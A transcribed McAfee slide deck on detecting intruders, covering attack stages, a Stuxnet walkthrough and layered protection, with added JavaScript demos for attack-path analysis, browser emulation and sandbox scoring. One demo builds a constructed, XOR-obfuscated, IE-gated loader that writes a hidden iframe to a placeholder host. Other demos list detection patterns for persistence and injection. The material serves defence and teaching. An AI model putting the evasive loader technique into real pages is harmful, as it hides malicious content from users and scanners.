7/27/2019 Detecting and Preventing Intruders - M Mastrangelli
1/19
Detecting and Preventing Intruders
Mark Mastrangeli, Sr. Sales Engineer, Government, Healthcare and Education
McAfee Confidential - Internal Use Only
Agenda: Detecting and Preventing Intruders
- Threat Landscape
- Attack Graphing
- Protection Graphing
- Anti-Virus?
- HTML 5 Malware with Evasion
- Advanced Malware Detection
Malware Continues to Grow

[Chart: new malware samples per quarter, Q1 2010 through Q1 2013; y-axis 0 to 14,000,000. Source: McAfee Labs, 2013]

- New malware samples grew 22% from Q4 2012 to Q1 2013.
- 2012 new malware sample discoveries increased 50% over 2011.
- Malware continues to grow, and is getting more sophisticated.
Attack Graph Overview
Attack Graph Basics

First contact:
- User visits trusted web site: server compromised (e.g. PHP vuln); XSS vulnerability
- User visits untrusted web site: Blackhat SEO; malicious ad; URL in forum posting; clickjacking
Either way, the user ends up on a page with malicious content.

Local execution:
- Convince user to run executable: video codec, game crack, etc.
- File format vulnerability: MS Office, Adobe Acrobat, etc.
- Browser vulnerability: browser exploit; ActiveX or BHO/plugin exploits; ActiveX control unsafe for scripting (e.g. ADODB)
Each branch ends in malicious code execution.
Four Stages of Attack

1. First Contact
- Send unsolicited message (IM, etc.)
- Physical access to HW (e.g. stolen laptop)
- Insert physical media (e.g. USB drive)
- User visits untrusted web site
- User visits trusted web site
- Man in the middle: wired; wireless (e.g. rogue AP)
- Remote exploit: network service exploit; application exploit (e.g. web server)
- Access target's LAN; public WAP

2. Local Execution
- User visits page with malicious content
- User opens malicious message
- User visits page (apparently) controlled by attacker: phishing attack
- Modify server filesystem/database
- Convince user to run executable
- File format / browser vulnerability
All of these lead to malicious code execution.

3. Establish Presence
- Download and install additional malware
- Propagate to another system: network service exploit; copy to file share; etc.
- Persist on the system: modify existing service; add BHO or explorer extension; install service; etc.
- Self-preservation: disrupt security software or updates; rootkit techniques; process injection; etc.

4. Malicious Activity
- Tampering: malicious destruction of files; ransomware encrypts/modifies files, money extorted to recover them; destruction or modification of user's files
- Bot services: remote access; DDoS; send spam; open proxy. Command and control over IRC, HTTP, P2P, Twitter, etc. Bot installed and operational; bot services sold
- Capture sensitive data: keyloggers; man-in-the-browser; etc. Captured data transmitted, leading to intellectual property theft and identity theft / financial fraud
- Adware/scareware: browser plugins, toolbars, config changes, etc. Ads displayed, click fraud; user pays for fake AV
- Malware remains active in the system
Example: Stuxnet

The generic graph nodes are listed per stage, with the Stuxnet-specific annotations from the slides marked "Stuxnet:".

1. First Contact
- Physical access to HW (e.g. stolen laptop): Evil Maid attack
- Insert physical media (e.g. USB drive)
- Send unsolicited message (IM)
- User visits untrusted site (e.g. Blackhat SEO) or trusted web site (e.g. XSS vuln): user visits page with malicious content
- Access target's LAN; public WAP; compromise another system

2. Local Execution
- Execute from removable media: Autorun; Stuxnet: LNK exploit (0-day), CVE-2010-2568
- Message reader vulnerability
- Convince user to run executable; file format / browser vulnerability
- Read local file (e.g. cookie, password cache)
- OS exploit
- MITM / remote exploit / network service exploit: Stuxnet: Windows Server Service RPC exploit, CVE-2008-4250; Print Spooler exploit (0-day)
- Application exploit (e.g. web server): Stuxnet: use of the default password on the WinCC MS SQL database
- Modify server filesystem/database
- Malicious code execution; identity theft / financial fraud

3. Establish Presence
- Privilege escalation
- Propagate to another system: Stuxnet: uses RPC to propagate updates to other systems on the LAN
- Download & install additional malware: Stuxnet: updates and other code can be run
- Persist on the system: install service; add BHO or explorer extension; registry change (e.g. AppInit_DLLs); etc.
- Self-preservation: disrupt security software or updates; disable admin apps (task manager, safe mode, etc.); user-mode hook; kernel hook (SSDT, IDT, IRP, etc.); use signed driver or binary (Stuxnet: drivers signed with certificates belonging to Realtek and JMicron); process injection (Stuxnet: injects code into the PLC programming tool); hide (Stuxnet: hides the malicious LNK files)

4. Malicious Activity
- Modify industrial control system: Stuxnet: injects code into Step7, alters the code blocks written out to the PLC and hides the changes from the user. Outcome: industrial espionage, sabotage
- Bot services: remote access; DDoS; send spam; open proxy. Bot installed & operational; bot services sold
- Command control: IRC, HTTP, P2P, Twitter, etc. Stuxnet: simple HTTP protocol, with the communication code injected into IE
- Adware/scareware: emulate security software UI; browser config changes. Ads displayed, click fraud; user pays for fake AV
- Capture sensitive data: keyloggers; man-in-the-browser (hook comm APIs, user mode); read cached passwords from disk; change hosts file. Captured data transmitted, leading to intellectual property theft and identity theft / financial fraud
- Malware remains active on the system

Note the validly signed drivers: a code-signing check on its own does not distinguish this driver from legitimate hardware vendor software, which is why driver loading needs a rootkit-prevention or allowlisting control rather than a signature check alone.
Protection Graph
Four Stages of Attack
- First Contact: physical access; unsolicited message; website; network access
- Local Execution: exploit; social engineering; configuration error
- Establish Presence: download malware; escalate privilege; persist on system; self-preservation
- Malicious Activity: propagation; bot activities; adware & scareware; identity & financial fraud; tampering
4 Phase Protection Methods

Controls mapped across the four phases (First Contact, Local Execution, Establish Presence, Malicious Activity):
- McAfee SiteAdvisor: website filtering
- McAfee Enterprise Mobility Management: mobile device management
- McAfee Device Control: physical file transfer
- McAfee Desktop Firewall (appears twice in the matrix)
- Web filtering; email filtering
- Advanced Anti-Malware & Detection
- McAfee VirusScan Enterprise: on-access scanning, file scanning, write blocking
- McAfee Database Activity Monitor: database vulnerability blocking
- McAfee Deep Defender: rootkit prevention
- McAfee Host Intrusion Prevention: buffer overflow prevention, behavioral prevention
- McAfee Application Control for servers or desktops: install and execution prevention, change protection
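The attack graph and the protection graph laid over it are easier to reason about as data: enumerate every path from first contact to malicious activity, then check which paths the deployed controls cut. The JavaScript below is an added example, not McAfee's code or tooling; the node names follow the slides, while the edges, the control names and the node each control is assumed to block are simplifying assumptions.

```javascript
// Added example (not McAfee code): the deck's attack graph as data, with a
// protection graph laid over it. Node names follow the slides; edges, control
// names and which node each control blocks are illustrative assumptions.

// Each key is a node "stage:technique"; the value lists the nodes an attacker
// can move to next. Nodes that never appear as a key are end goals.
const ATTACK_GRAPH = {
  "first_contact:usb_media":             ["local_execution:autorun", "local_execution:lnk_exploit"],
  "first_contact:untrusted_website":     ["local_execution:browser_exploit", "local_execution:run_executable"],
  "first_contact:trusted_website":       ["local_execution:browser_exploit"],
  "first_contact:network_access":        ["local_execution:service_exploit"],
  "local_execution:autorun":             ["establish_presence:download_malware"],
  "local_execution:lnk_exploit":         ["establish_presence:install_service", "establish_presence:signed_driver"],
  "local_execution:browser_exploit":     ["establish_presence:download_malware"],
  "local_execution:run_executable":      ["establish_presence:download_malware"],
  "local_execution:service_exploit":     ["establish_presence:install_service"],
  "establish_presence:download_malware": ["malicious_activity:bot_c2", "malicious_activity:capture_data"],
  "establish_presence:install_service":  ["malicious_activity:bot_c2", "malicious_activity:tamper_ics"],
  "establish_presence:signed_driver":    ["malicious_activity:tamper_ics"],
};

// Protection graph: a control covers a path when it blocks any node on it.
const CONTROLS = {
  web_filtering:       ["first_contact:untrusted_website"],
  device_control:      ["first_contact:usb_media"],
  desktop_firewall:    ["first_contact:network_access"],
  hips_bof_prevention: ["local_execution:browser_exploit", "local_execution:service_exploit"],
  av_on_access:        ["establish_presence:download_malware"], // assumes the dropped file is a known sample
  application_control: ["local_execution:run_executable", "establish_presence:install_service",
                        "establish_presence:signed_driver"],
  rootkit_prevention:  ["establish_presence:signed_driver"],
};

// Depth-first walk from one entry node to every reachable end goal.
function enumeratePaths(graph, start) {
  const paths = [];
  (function walk(node, trail) {
    const next = graph[node] || [];
    if (next.length === 0) { paths.push(trail); return; }
    for (const n of next) walk(n, trail.concat(n));
  })(start, [start]);
  return paths;
}

// Entry nodes are those no edge points to (the First Contact stage).
function allPaths(graph) {
  const targets = new Set(Object.values(graph).flat());
  return Object.keys(graph).filter((n) => !targets.has(n)).flatMap((s) => enumeratePaths(graph, s));
}

function blockedNodes(deployed, controls) {
  return new Set(deployed.flatMap((c) => controls[c] || []));
}

// Paths on which none of the deployed controls block a node.
function uncoveredPaths(paths, deployed, controls) {
  const blocked = blockedNodes(deployed, controls);
  return paths.filter((p) => !p.some((n) => blocked.has(n)));
}

// Greedy set cover: repeatedly add the control that closes the most still-open
// paths. Cheap and usually good, not guaranteed minimal.
function greedyControlSet(paths, controls) {
  const chosen = [];
  let open = paths.slice();
  while (open.length > 0) {
    let best = null, bestGain = 0;
    for (const name of Object.keys(controls)) {
      if (chosen.includes(name)) continue;
      const gain = open.length - uncoveredPaths(open, [name], controls).length;
      if (gain > bestGain) { best = name; bestGain = gain; }
    }
    if (best === null) break; // remaining paths touch no node any control covers
    chosen.push(best);
    open = uncoveredPaths(open, [best], controls);
  }
  return { chosen, uncovered: open };
}

const paths = allPaths(ATTACK_GRAPH);
console.log(`${paths.length} attack paths`);
console.log("open with AV only:", uncoveredPaths(paths, ["av_on_access"], CONTROLS).map((p) => p.join(" -> ")));
console.log("greedy control set:", greedyControlSet(paths, CONTROLS).chosen);
```

Run it with node. With only av_on_access deployed, the USB/LNK and network-service paths that never drop a scannable file stay open, which is the AV-only gap; greedyControlSet() then picks application_control as the single control that closes all of them. Real graphs are larger and controls are partial (an on-access scanner only stops known samples), so treat the output as a prioritisation aid, not a proof of coverage.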
Cost of an AV-Only Strategy: Customer Survey
- AV-only users spent 1.5 times more than leaders.
- Less efficient: leaders deployed security at higher scale and lower cost than the AV-only group.
- Less effective: the AV-only group bore higher costs due to outbreaks.
- AV-only users accepted 68% of IT-security-related risk, compared to just 58% for the leading performers.
Source: Aberdeen Research, 3-2012
Exploit Toolkit Coverage
Today's malware threats, such as the Blackhole and Phoenix exploit kits, require full web browser emulation: ECMAScript and the W3C (HTML) DOM need to be simulated correctly, and browser-specific differences also need to be simulated. A kit's landing page fingerprints the visiting browser and only takes the malicious branch when the environment matches; an analyzer that runs the script in a generic interpreter never reaches the branch a real victim would.
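Why a generic script interpreter is not enough, as an added example that is not McAfee code and not a real Blackhole or Phoenix script: a constructed landing-page loader gated on an Internet Explorer-only DOM quirk, run by a minimal emulator under several assumed browser profiles. The profile values, the XOR key, the hidden iframe and its URL are all made up for the example.

```javascript
// Added example (not McAfee code, not a real exploit-kit script): a constructed
// loader that decodes its payload only when the environment looks like old IE,
// plus a minimal emulator that runs it under several browser profiles.

const IE_KEY = 0x5a;
const HIDDEN_HTML = '<iframe src="http://landing.example.invalid/gate.php" width="1" height="1"></iframe>';

// XOR-obfuscate text to hex (the kit author's build step). A real kit ships
// only the hex; it is derived here so the example stays readable.
function xorHex(text, key) {
  return Array.from(text, (ch) => (ch.charCodeAt(0) ^ key).toString(16).padStart(2, "0")).join("");
}

// The script as the victim's browser would receive it.
const LANDING_SCRIPT = `
  // typeof document.all is "undefined" outside IE (other engines hide it on
  // purpose), and IE 8 and older also lack document.addEventListener.
  var isOldIE = typeof document.all !== "undefined" &&
                typeof document.addEventListener === "undefined";
  if (!isOldIE) { document.title = "Please wait"; return; }   // benign path for everyone else
  // The key is only right on a populated DOM: an emulator with an empty page decodes garbage.
  var key = document.all.length > 0 ? 0x5a : 0;
  var hex = "${xorHex(HIDDEN_HTML, IE_KEY)}", out = "";
  for (var i = 0; i < hex.length; i += 2) out += String.fromCharCode(parseInt(hex.substr(i, 2), 16) ^ key);
  document.write(out);
`;

// Browser profiles the emulator can present (assumed values).
const PROFILES = {
  ie6:     { userAgent: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", documentAll: true, addEventListener: false, domNodes: 40 },
  ie9:     { userAgent: "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)", documentAll: true, addEventListener: true, domNodes: 40 },
  firefox: { userAgent: "Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0", documentAll: false, addEventListener: true, domNodes: 40 },
  naive:   { userAgent: "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", documentAll: true, addEventListener: false, domNodes: 0 }, // right UA, empty DOM
};

// Build fake window/document/navigator objects and hook the DOM sink
// (document.write) so whatever the script emits is captured for inspection.
function makeBrowser(profile) {
  const doc = { title: "", writes: [], write(html) { this.writes.push(html); } };
  if (profile.documentAll) doc.all = { length: profile.domNodes };
  if (profile.addEventListener) doc.addEventListener = function () {};
  const nav = { userAgent: profile.userAgent };
  const win = { document: doc, navigator: nav };
  return { win, doc, nav };
}

// Function() scoping stands in for the emulator's interpreter: the script only
// sees the objects passed in, never the host's globals.
function emulate(scriptSource, profile) {
  const b = makeBrowser(profile);
  new Function("window", "document", "navigator", scriptSource)(b.win, b.doc, b.nav);
  return b.doc;
}

function extractIframeSources(htmlChunks) {
  const re = /<iframe[^>]*\ssrc=["']([^"']+)["']/gi;
  return htmlChunks.flatMap((html) => Array.from(html.matchAll(re), (m) => m[1]));
}

// Run the script under every profile: the analyzer has to try the variants a
// real victim could be, not one generic interpreter.
function analyze(scriptSource) {
  const findings = {};
  for (const [name, profile] of Object.entries(PROFILES)) {
    findings[name] = extractIframeSources(emulate(scriptSource, profile).writes);
  }
  return findings;
}

console.log(analyze(LANDING_SCRIPT));
```

Only the ie6 profile yields the hidden iframe URL; IE 9, Firefox and the "naive" emulator that advertises an IE user agent over an empty DOM all see a harmless page. The lesson carries to real kits: the user-agent string is the least of it, the DOM shape and engine quirks (document.all, addEventListener, plugin enumeration) have to be modelled per browser, and every sink the page can write to needs hooking.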
What is Sandboxing?
- Run a suspect file in a safe (virtual) environment
- Analyze the actual behavior of any unknown file
- Report on the intent of any file, malicious or not

[Diagram: unknown files (?) enter sandboxing and come out classified as safe or malware]
Advanced Threat Defense

Dynamic analysis:
- Observe registry modifications
- Observe network communications
- Observe process activities
- Observe file system changes

Static code analysis:
- Unpacking
- Static analysis of disassembled code
- Discovery of latent code and hidden logic paths
- Graphing

[Diagram: unknown files (?) enter sandboxing and come out classified as safe or malware]
Multiple Anti-Malware Methods

Layers ordered from the fastest and shallowest to the slowest and deepest; the real-time down-select process passes on only what the earlier layers could not decide:
1. Anti-virus signatures
2. Anti-virus inspection
3. Global file reputation
4. Emulation engine
5. Advanced sandboxing: static and dynamic code analysis

[Diagram axes: duration of analysis vs. depth of analysis]
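An added example (not McAfee code) of the down-select: fast signature and reputation lookups first, then static indicators and sandbox behaviour scoring only for what is still unknown. The hashes, behaviour reports, hostnames, rule weights and thresholds are constructed for illustration; the behaviours scored are the ones the Stuxnet slide lists under Establish Presence (registry persistence, driver install, process injection, disrupting security software, HTTP beaconing).

```javascript
// Added example (not McAfee code): a layered down-select in the slide's order,
// cheap lookups first and the sandbox last, only for what is still unknown.
// Hashes, behaviour reports, hosts, weights and thresholds are all constructed.

const SIGNATURES = new Set(["sha256-known-bad-0001"]);                  // AV signature hit
const REPUTATION = new Map([["sha256-known-good-0002", "clean"],      // global file reputation
                            ["sha256-known-bad-0001", "malicious"]]);
const ALLOWED_HOSTS = new Set(["downloads.vendor.example", "crl.vendor.example"]);
const SECURITY_TOOLS = new Set(["avscanner.exe", "taskmgr.exe"]);

// Static/emulation indicators. Packing is suspicious; a valid code signature is
// deliberately worth nothing, since the Stuxnet drivers carried valid
// Realtek and JMicron signatures.
const STATIC_RULES = [
  { name: "packed executable", weight: 10, test: (s) => s.packed === true },
];

// Behaviours observed in the sandbox, as the Establish Presence stage lists them.
const BEHAVIOR_RULES = [
  { name: "registry persistence", weight: 30,
    test: (r) => r.registry.some((e) => /\\Run\\|AppInit_DLLs|\\Services\\/i.test(e.key)) },
  { name: "kernel driver dropped", weight: 25,
    test: (r) => r.files.some((e) => e.op === "create" && /\\drivers\\[^\\]+\.sys$/i.test(e.path)) },
  { name: "process injection", weight: 25,
    test: (r) => r.processes.some((e) => e.op === "inject") },
  { name: "security software disrupted", weight: 20,
    test: (r) => r.processes.some((e) => e.op === "terminate" && SECURITY_TOOLS.has(e.target.toLowerCase())) },
  { name: "beacon to unknown host", weight: 15,
    test: (r) => r.network.some((e) => !ALLOWED_HOSTS.has(e.host)) },
];

function scoreSample(sample) {
  const hits = [
    ...STATIC_RULES.filter((r) => r.test(sample.static)),
    ...BEHAVIOR_RULES.filter((r) => r.test(sample.report)),
  ];
  return { score: hits.reduce((n, r) => n + r.weight, 0), indicators: hits.map((r) => r.name) };
}

function verdictFromScore(n) {
  return n >= 60 ? "malicious" : n >= 30 ? "suspicious" : "clean";
}

// Stop at the first layer that can decide; only the residue pays for deep analysis.
function downSelect(sample) {
  if (SIGNATURES.has(sample.sha256)) {
    return { stage: "signature", verdict: "malicious", score: null, indicators: [] };
  }
  if (REPUTATION.has(sample.sha256)) {
    return { stage: "reputation", verdict: REPUTATION.get(sample.sha256), score: null, indicators: [] };
  }
  const { score, indicators } = scoreSample(sample);
  return { stage: "sandbox", verdict: verdictFromScore(score), score, indicators };
}

// Constructed inputs: two already-known hashes and two unknowns with sandbox reports.
const SAMPLES = {
  knownBad:  { sha256: "sha256-known-bad-0001" },
  knownGood: { sha256: "sha256-known-good-0002" },
  dropper: {
    sha256: "sha256-unknown-0003",
    static: { packed: true, signer: "Example Hardware Co." },
    report: {
      registry:  [{ op: "set", key: "HKLM\\SYSTEM\\CurrentControlSet\\Services\\exdrv\\ImagePath",
                    value: "\\SystemRoot\\System32\\drivers\\exdrv.sys" },
                  { op: "set", key: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs",
                    value: "exhook.dll" }],
      files:     [{ op: "create", path: "C:\\Windows\\System32\\drivers\\exdrv.sys" }],
      processes: [{ op: "inject", target: "explorer.exe" }, { op: "inject", target: "iexplore.exe" }],
      network:   [{ proto: "http", host: "update.example.invalid", path: "/index.php" }],
    },
  },
  installer: {
    sha256: "sha256-unknown-0004",
    static: { packed: false, signer: "Example Software Ltd." },
    report: {
      registry:  [{ op: "set", key: "HKCU\\Software\\ExampleApp\\Version", value: "2.1" }],
      files:     [{ op: "create", path: "C:\\Program Files\\ExampleApp\\app.exe" }],
      processes: [{ op: "create", target: "app.exe" }],
      network:   [{ proto: "https", host: "downloads.vendor.example", path: "/app/2.1/notes.txt" }],
    },
  },
};

for (const [name, sample] of Object.entries(SAMPLES)) console.log(name, downSelect(sample));
```

The two known hashes never reach the sandbox; the packed, signed dropper scores on persistence, driver install, injection and beaconing and is convicted by behaviour, while the unknown installer with ordinary activity comes out clean. Weights and thresholds are the part a real deployment tunes against its own false-positive rate, and a sandbox-aware sample can still stall or check for a virtual environment, which is why the static layer keeps its own indicators rather than trusting execution alone.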